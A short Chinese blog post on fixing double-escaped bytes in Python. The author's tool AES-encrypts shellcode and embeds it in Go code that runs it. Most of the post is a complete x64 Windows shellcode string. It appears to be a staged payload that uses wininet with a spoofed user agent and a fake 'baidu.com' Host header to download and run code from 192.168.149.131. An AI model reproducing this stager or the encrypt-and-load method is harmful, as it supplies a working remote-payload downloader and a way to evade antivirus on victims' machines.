python操作一段shellcode遇到的问题bytes 转义符问题

Posted 2022-01-30 Recar

我写的程序会接收一个shellcode的变量 然后将这个shellcode aes加密的字符串写到go的代码里 go使用go-shellcode执行shellcode

一、python2和python3对于 这种类型的字符串是不一样的

#!/usr/bin/python
# coding=utf-8
'''
Date: 2021-09-24 10:33:47
LastEditors: recar
LastEditTime: 2021-09-24 10:33:53
'''

text = b"\\xfc\\x48\\x83\\xe4\\xf0\\xe8\\xc8\\x00\\x00\\x00\\x41\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\\x20\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x4d\\x31\\xc9\\x48\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\\xe2\\xed\\x52\\x41\\x51\\x48\\x8b\\x52\\x20\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x66\\x81\\x78\\x18\\x0b\\x02\\x75\\x72\\x8b\\x80\\x88\\x00\\x00\\x00\\x48\\x85\\xc0\\x74\\x67\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\\x49\\x01\\xd0\\xe3\\x56\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\x4d\\x31\\xc9\\x48\\x31\\xc0\\xac\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\\x38\\xe0\\x75\\xf1\\x4c\\x03\\x4c\\x24\\x08\\x45\\x39\\xd1\\x75\\xd8\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\\x01\\xd0\\x41\\x58\\x41\\x58\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5a\\x48\\x83\\xec\\x20\\x41\\x52\\xff\\xe0\\x58\\x41\\x59\\x5a\\x48\\x8b\\x12\\xe9\\x4f\\xff\\xff\\xff\\x5d\\x6a\\x00\\x49\\xbe\\x77\\x69\\x6e\\x69\\x6e\\x65\\x74\\x00\\x41\\x56\\x49\\x89\\xe6\\x4c\\x89\\xf1\\x41\\xba\\x4c\\x77\\x26\\x07\\xff\\xd5\\x48\\x31\\xc9\\x48\\x31\\xd2\\x4d\\x31\\xc0\\x4d\\x31\\xc9\\x41\\x50\\x41\\x50\\x41\\xba\\x3a\\x56\\x79\\xa7\\xff\\xd5\\xeb\\x73\\x5a\\x48\\x89\\xc1\\x41\\xb8\\x39\\x30\\x00\\x00\\x4d\\x31\\xc9\\x41\\x51\\x41\\x51\\x6a\\x03\\x41\\x51\\x41\\xba\\x57\\x89\\x9f\\xc6\\xff\\xd5\\xeb\\x59\\x5b\\x48\\x89\\xc1\\x48\\x31\\xd2\\x49\\x89\\xd8\\x4d\\x31\\xc9\\x52\\x68\\x00\\x02\\x60\\x84\\x52\\x52\\x41\\xba\\xeb\\x55\\x2e\\x3b\\xff\\xd5\\x48\\x89\\xc6\\x48\\x83\\xc3\\x50\\x6a\\x0a\\x5f\\x48\\x89\\xf1\\x48\\x89\\xda\\x49\\xc7\\xc0\\xff\\xff\\xff\\xff\\x4d\\x31\\xc9\\x52\\x52\\x41\\xba\\x2d\\x06\\x18\\x7b\\xff\\xd5\\x85\\xc0\\x0f\\x85\\x9d\\x01\\x00\\x00\\x48\\xff\\xcf\\x0f\\x84\\x8c\\x01\\x00\\x00\\xeb\\xd3\\xe9\\xe4\\x01\\x00\\x00\\xe8\\xa2\\xff\\xff\\xff\\x2f\\x75\\x31\\x6a\\x4d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x00\\x55\\x73\\x65\\x72\\x2d\\x41\\x67\\x65\\x6e\\x74\\x3a\\x20\\x4d\\x6f\\x7a\\x69\\x6c\\x6c\\x61\\x2f\\x35\\x2e\\x30\\x20\\x28\\x63\\x6f\\x6d\\x70\\x61\\x74\\x69\\x62\\x6c\\x65\\x3b\\x20\\x4d\\x53\\x49\\x45\\x20\\x37\\x2e\\x30\\x3b\\x20\\x57\\x69\\x6e\\x64\\x6f\\x77\\x73\\x20\\x4e\\x54\\x20\\x35\\x2e\\x31\\x3b\\x20\\x54\\x72\\x69\\x64\\x65\\x6e\\x74\\x2f\\x35\\x2e\\x30\\x29\\x0d\\x0a\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x00\\x41\\xbe\\xf0\\xb5\\xa2\\x56\\xff\\xd5\\x48\\x31\\xc9\\xba\\x00\\x00\\x40\\x00\\x41\\xb8\\x00\\x10\\x00\\x00\\x41\\xb9\\x40\\x00\\x00\\x00\\x41\\xba\\x58\\xa4\\x53\\xe5\\xff\\xd5\\x48\\x93\\x53\\x53\\x48\\x89\\xe7\\x48\\x89\\xf1\\x48\\x89\\xda\\x41\\xb8\\x00\\x20\\x00\\x00\\x49\\x89\\xf9\\x41\\xba\\x12\\x96\\x89\\xe2\\xff\\xd5\\x48\\x83\\xc4\\x20\\x85\\xc0\\x74\\xb6\\x66\\x8b\\x07\\x48\\x01\\xc3\\x85\\xc0\\x75\\xd7\\x58\\x58\\x58\\x48\\x05\\x00\\x00\\x00\\x00\\x50\\xc3\\xe8\\x9f\\xfd\\xff\\xff\\x31\\x39\\x32\\x2e\\x31\\x36\\x38\\x2e\\x31\\x34\\x39\\x2e\\x31\\x33\\x31\\x00\\x00\\x00\\x00\\x00"
print(type(text))

二、python接收到的变量是 \\\\xfc\\\\x48\\\\x83\\\\xe4 的 然后加密的时候因为多了 转义符导致跟预期的不一致
那怎么把这个转义符去掉达到预期

import codecs
变量=codecs.escape_decode(有多余转义变量, "hex-escape")

也就是如果下次遇到要扣buf等类似的需求 并且变量是传过来的 可以使用这个方法还原回去